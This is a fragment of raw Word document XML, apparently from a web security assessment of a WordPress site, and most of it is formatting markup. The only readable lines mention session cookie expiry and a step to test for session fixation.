          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wpdm_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) expire when the browser session ends.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="009A74F9" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Test session fixation attacks by injecting a custom session ID and observing behavior.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A06052" w:rsidRPr="009A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5pt;height:11.65pt" o:bullet="t">
        <v:imagedata r:id="rId1" o:title="msoFD2E"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="01A94C01"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E9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2C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAD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5EF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="027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3448"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB5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C1B56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F20E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55D0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="271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27288"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="540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A0FFF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0E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19B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44E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A6F74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="206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A234B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="687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21E16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECA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66A04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB3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526A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="295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174DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76E23AD2"/>
    <w:lvl w:ilvl="0" w:tplc="D9F8A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F065E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B33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A58D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="118463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273B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84A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7581A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6382FE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CE7446"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2FB0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55F90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E8B8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1395D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF9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45EE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A3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801B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="952E9630"/>
    <w:lvl w:ilvl="0" w:tplc="B1B4E5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F42A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8920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095938"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19A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C0065"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96B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02AF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCE8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A183C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB9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D1946"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="992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96423"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE2C469A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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="71A64E15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D3E309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C47D5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F22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15"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="28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52"/>
    <w:rsid w:val="00032514"/>
    <w:rsid w:val="00050164"/>
    <w:rsid w:val="00197C58"/>
    <w:rsid w:val="0023474F"/>
    <w:rsid w:val="002E5EF2"/>
    <w:rsid w:val="003A3B54"/>
    <w:rsid w:val="003B77A5"/>
    <w:rsid w:val="0040144C"/>
    <w:rsid w:val="0051520C"/>
    <w:rsid w:val="005A1209"/>
    <w:rsid w:val="006002ED"/>
    <w:rsid w:val="00622DB6"/>
    <w:rsid w:val="00687018"/>
    <w:rsid w:val="007A7C47"/>
    <w:rsid w:val="00892D1A"/>
    <w:rsid w:val="00903196"/>
    <w:rsid w:val="00905C08"/>
    <w:rsid w:val="009A74F9"/>
    <w:rsid w:val="009B511E"/>
    <w:rsid w:val="009E4118"/>
    <w:rsid w:val="00A06052"/>
    <w:rsid w:val="00A44824"/>
    <w:rsid w:val="00B33515"/>
    <w:rsid w:val="00D32586"/>
    <w:rsid w:val="00E14180"/>
    <w:rsid w:val="00FD286F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ECBB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C052C8B3-D9EE-4980-B475-54D9C20A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060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060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60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0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6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605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4F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A74F9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009A74F9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009A74F9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009A74F9"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009B5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5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1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5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1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9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4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2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2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u.edu.pk/wp-log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7.tmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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WAHEED</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>HADIA WAHEED</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-03T17:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-12T19:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>